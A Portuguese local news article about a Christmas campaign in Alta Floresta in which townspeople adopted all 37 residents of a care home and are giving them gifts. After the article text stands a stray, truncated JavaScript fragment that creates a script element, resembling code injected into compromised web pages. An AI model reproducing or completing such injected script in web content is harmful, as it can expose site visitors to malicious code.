Capa / Cidades / Idosos da Casa são adotados pela população e ganharão presentes

Idosos da Casa são adotados pela população e ganharão presentes

vestidoDionéia Martins

Os 37 idosos que moram na Casa Lar dos Idosos Pedro Sierra Sanches, terão um natal diferente este ano. A campanha de natal Adote um Idoso, está sendo desenvolvida em diversas cidades do Brasil pelas redes sociais, e em Alta Floresta a Drogaria Universal lançou a campanha pela página do facebook e em poucos horas já havia dezenas de compartilhamentos e pessoas interessadas em contribuir.

As imagens deles segurando uma placa que descreve o que gostariam de ganhar de presente no Natal deste ano estão sendo divulgadas na internet pelos idealizadores da campanha. Os idosos fazem pedidos simples, como calça, camisa, vestido, chinelo, sapato, chapéu, macaco pelúcia, camiseta do time preferido, entre outros.

Em menos de uma semana de campanha, todos os idosos foram adotados e  presentes já estão sendo entregues para que possa antes conferir o tamanho. A entrega dos presentes está programada para acontecer no dia 18 de dezembro, com direito a  Papai Noel.

As farmacêuticas Francielly e Viviane foram encarregadas de tirar as fotos dos idosos e postar na rede social. Para Francielly, foi um momento muito marcante em que foram recebidas com muito carinho. Os idosos ficaram encantados e surpresos.

“Alguns nem acreditavam, eles perguntavam se era verdade que eles iam ganhar presentes, porque estão lá praticamente abandonados e não ganham presentes”, relatou Francielly. Ver a felicidade dos idosos com a possibilidade de ganhar um presente, deixou as jovens preocupadas com o resultado da campanha.

“Quando entramos no carro falei pra Vivi que se ninguém desse nada, nós íamos ter arrumar os presentes, porque eles ficaram muitos felizes e faz tempo que não ganham nada”, disse a farmacêutica. Mas logo que as fotos foram postadas na internet a preocupação passou, solidarias os internautas começaram a confirmar a adoção e hoje todos já forma adotados e os presentes continuam a chegar.

Além dos presentes que alegrará muito seu Natal, os idosos irão ganhar o carinho, atenção e uma tarde de confraternização. Uma moradora também doou uma televisão para o lar.

Quem tiver interesse pode doar outros itens para o lar dos idosos, e também pode contribuir para a realização da festinha que será realizada na tarde de entrega dos presentes. Para mais informações pode procurar a Casa Lar ou a Drogaria Universal ou ainda pelos telefones 3521- 8757 ou 3521-2721.

 

 var d=document;var s=d.createElement(‘script’);

Sobre Kariny Santos

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top